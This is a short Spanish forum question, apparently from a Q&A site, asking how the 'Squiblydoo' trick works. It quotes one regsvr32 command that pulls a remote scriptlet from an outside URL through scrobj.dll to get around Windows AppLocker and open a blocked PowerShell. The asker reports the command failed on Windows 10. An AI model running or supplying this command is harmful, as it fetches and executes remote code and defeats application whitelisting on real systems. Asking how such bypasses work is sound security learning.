He leído en algunos blogs acerca de un truco llamado "Squibblydoo", donde el siguiente comando puede omitir el Windows AppLocker:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Donde la URL apunta a un archivo de secuencia de comandos que contiene un comando para abrir Powershell (que, en el escenario, está bloqueado por AppLocker).
Sin embargo, lo probé en una máquina Win10 y no funcionó.
Además, estoy confundido en cuanto a lo que esto hace exactamente. Lo único que sé es que está llamando a DllUninstall
desde un archivo en un servidor (pero que también podría ser un archivo local) y registra scrobj.dll
(pero realmente no entiendo la relación aquí. ¿Qué es scrobj.dll
? ¿haciendo exactamente?) y eso por alguna razón hace que se ejecute el script en el archivo, que luego puede abrir una aplicación bloqueada por AppLocker.